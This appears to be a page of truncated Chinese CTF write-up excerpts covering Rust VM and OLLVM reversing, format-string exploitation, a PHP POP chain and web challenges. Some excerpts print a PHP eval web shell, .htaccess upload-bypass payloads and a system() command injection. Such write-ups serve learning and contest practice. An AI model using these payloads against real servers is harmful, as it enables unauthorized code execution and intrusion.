前言自己第一次做出来关于rust这方面的逆向题目，真的是体会到了什么叫做 💩 上加 💩分析首先拿到题目，题干就说是rustvm，关键这个题还就三百分..现在逆向真是太难了。先定位到关键函数开始分析，上面的报错不用管，可以看到也是有一堆的东西这边进去看一下可以知道这几个是干嘛的，配合动调可以知道把输入的东西转成int。这边有些thread线程的东西，含义不明也没关系，不影响接下来的做题，想搞懂这些都是干嘛的还是得动调一步一步走着看，这段代码重复了八次，每次都把这边是一些输出的信息，这函数类似于printf，不用具体分析这一块先malloc然后配合动调可以知道把输入的东西都读进去v129了这...

周六忘了比赛，晚上快六点才拿到题目，看了下感觉能做，研究了下，最后还是可惜，比赛结束了拿到题目ida打开惯例看一下main再看看汇编基本上确定是ollvm了下面那一堆整齐的是真实块，上面通过分发器跳转才到达真实块执行代码。看到群里有大佬直接通过动调跳转找代码的，那确实是真功夫...脚本小子直接拿deflat.py还原了。建议放虚拟机里面，装GitHub页面推荐的angr版本脚本还原之后的样子这个时候f5已经可以看了PART1先看看第一部分的代码，前面到qmemcpy的代码是正常的分配内存和输入输出。后面进行了很长一堆的运算，其实都不用看，其实可以分析出来，前面都是静态的拿现有的进行操作，...

W@v3s战队一、战队信息名称：W@v3s排名：9二、解题情况粘贴解题图片三、解题过程Web题目一名称 Checkin直接访问 Burp抓包即可得到flag关键步骤截图题目二名称 pppopPop链的exp:<?php class A1{ public $tmp1; public $tmp2; } class A3{ } class A4{ public $tmp1; } class A6{ public $tmp1; } class A8{ } $a1 = new A1(); $a3 = new A3(); $a4 = new A4(); $...

格式化字符串的一道题，整了一整天才弄明白，问了我哦等我哈了大佬和口那是二进制神。来复现一下这个题目是这样的，看起来是不是很简单，确实，我刚开始学，啥也不是。第一关先康康前面七句 :Coolapk84:这个属于是第一关了，格式化字符串改数值。要利用11行这个把v3改成12。那么咋改呢，利用格式化字符串漏洞，由于这个题目限制输入比较严格，需要打开gdb来调试，看格式化字符串的偏移。据二进制神称，我们需要用gdb把点断在call scanf后面一行，这里可以用disassemble vuln来看汇编：可以看到 0x08048625 <+79>: call 0x8048...

第一次参加的校赛 :Coolapk46: 要被锤爆了好多大佬噢，还有个没进集训队的巨佬直接冲到第三，tql这里是官方题目和wphttps://github.com/A1natas/zjnuctf-school-contest-2021下面是菜鸡wp请慢用热身网络安全法直接搜网络安全法颁布日期webweb签到Hackbar post system(“cat flag;”)即可easy upload上传.htaccess文件，内容为<FilesMatch "evil.png"> SetHandler application/x-httpd-php <...

:Coolapk140: 本篇可能会持续更新PART1RE11:Java逆向解密这个是为数不多自己做的题下载来是个.class文件，用jadx打开来是这个样子看到26有一堆奇奇怪怪的，看着就像ascii的东西，有个加密函数那么就写个解密脚本key=[180, 136, 137, 147, 191, 137, 147, 191, 148, 136, 133, 191, 134, 140, 129, 135, 191, 65] flag='' for i in key: s=(i^32)-ord('@') flag+=chr(s) print flag 运行结果:flag:...

MISCpng下载图片发现是一张可爱猫咪图片，直接放到010editor里面，发现图片尾部有一段base64M2I3OWJkZjhmY2ZkNTVmZH0=，拿去解码得到3b79bdf8fcfd55fd}，后面好像没有什么东西了，然后尝试crc隐写。放入脚本解码得到原本的宽高为04 29修改后得到flag第一部分 不说人话进去一看只有.!?三个字符，直接想到是Ook密码变形，然后打开记事本替换后解码即可https://www.splitbrain.org/services/ook 【真签到题】快来看直播进入直播间后flag就在上面【The End】世界的终焉明明是问卷，名字还这么高级溯源...

第一次参加这种比赛，写得很垃圾，200以上的都不会做。。。随便看看就好 :huaji13:题目名称：Welcome解题过程：打开发现405，百度搜索405发现需要使用post提交，burpsuite抓包改成post，forward，右键send to repeater然后读一下代码发现($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2']) 好怪啊这个东西，然后疯狂百度，搞了好久发现了这篇文章https://www.pianshen.com/article...

比赛:UNCTF2020校内赛ID:Satan9axuxuan AN_666 XunflashWeb1.easy_ssrf2.俄罗斯方块人大战奥特曼查看源代码,发现有一个压缩包下载下来发现有打开即可得到flag3.easy_upload解题过程：上传题，测试不能上传php，phtml等，发现数据库是apache，尝试上传.htaccess文件，文件内容plain AddType application/x-httpd-p\ hp .jpg 上传hp.jpg内容plain <?=eval($_POST[satan]); 连接蚁剑得到flag4.easyunserialize解题过...